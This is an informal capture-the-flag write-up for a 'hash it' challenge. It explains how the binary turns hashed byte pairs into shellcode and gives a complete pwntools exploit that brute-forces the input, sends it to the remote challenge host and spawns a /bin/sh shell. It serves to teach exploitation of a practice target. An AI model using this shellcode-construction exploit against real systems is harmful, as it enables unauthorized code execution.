### hash it

literally the only "normal" chall in this ctf lmfao all of the other ones are obscure architectures, weird custom implementations, way too new versions for existing tooling to support it yadayada

(ok maybe aside from not too advanced but still)

either way x86-64 ELF, reads in 4 bytes for malloc then reads in the amount of bytes specfified as data

does some hashing with an pointer array for 4 algorithms, then ends up jumping to the malloc'd address which is rwx'd

looking closer at the read loops, turns out its reading 2 bytes at a time then hash it with the rotating algorithms and fetching 1 byte from it to construct the shellcode to jump to

quickly wrote a reimplementation in python to check if its really just that, which ended up matching every byte aside from the first byte

turns out it was the newline char from me using the console manually lmao

either way with that since we are only dealing with pairs of bytes a good ol brute force would work for constructing the wanted shellcode

with some wackiness out of the way like using the wrong architecture for shellcode (oops) we can get a shell pretty easily

```py
from pwn import *
from Crypto.Hash import MD5, SHA1, SHA256, SHA512

payload = b''

algos = [MD5, SHA1, SHA256, SHA512]

#dont forget to set context or else you get 32 bits :)
context.binary = ELF('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
targetshellcode = asm(shellcraft.sh())

# targetshellcode = b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'

print(targetshellcode)

for i in range(0, len(targetshellcode)*2, 2):
    for test in range(0xFFFF):
        pair = int.to_bytes(test, byteorder='little', length=2)
        algo = algos[(i // 2 % 4)]
        h = algo.new()
        h.update(pair)
        if h.digest()[0] == targetshellcode[i//2]:
            payload += pair
            print(payload)
            break

print('final:', payload)


# payload = b'I\x00\x03\x00n\x00\x13\x00\xc2\x00\x80\x00\x11\x03[\x01\xc2\x006\x00<\x01\xea\x02x\x00\xf4\x01Z\x00r\x00\x88\x00<\x00\x11\x03A\x00n\x01\x8d\x00\x9a\x00\x84\x00n\x01\xc5\x00u\x00A\x00]\x00\xc3\x01C\x04U\x01\x90\x00\t\x01n\x00A\x00\xb7\x00\xdb\x00n\x00\x12\x00\xb7\x00\xd5\x01=\x01U\x01\xef\x00X\x02b\x01\x0e\x00'

#remote
p = remote('hash-it-0-m7tt7b7whagjw.shellweplayaga.me', 31337)
p.recvuntil('Ticket please:')
p.sendline(r'ticket{GangwayBoom2757n22:JPhP0TDldX6nhNGrjRYeXtC4eCTXxx6HWFyb8oUl55JtIl0M}')

#local
# p = process([context.binary.path])

# import time
# time.sleep(10)


p.send(int.to_bytes(len(payload), byteorder='big', length=4))
p.send(payload)
p.interactive()
```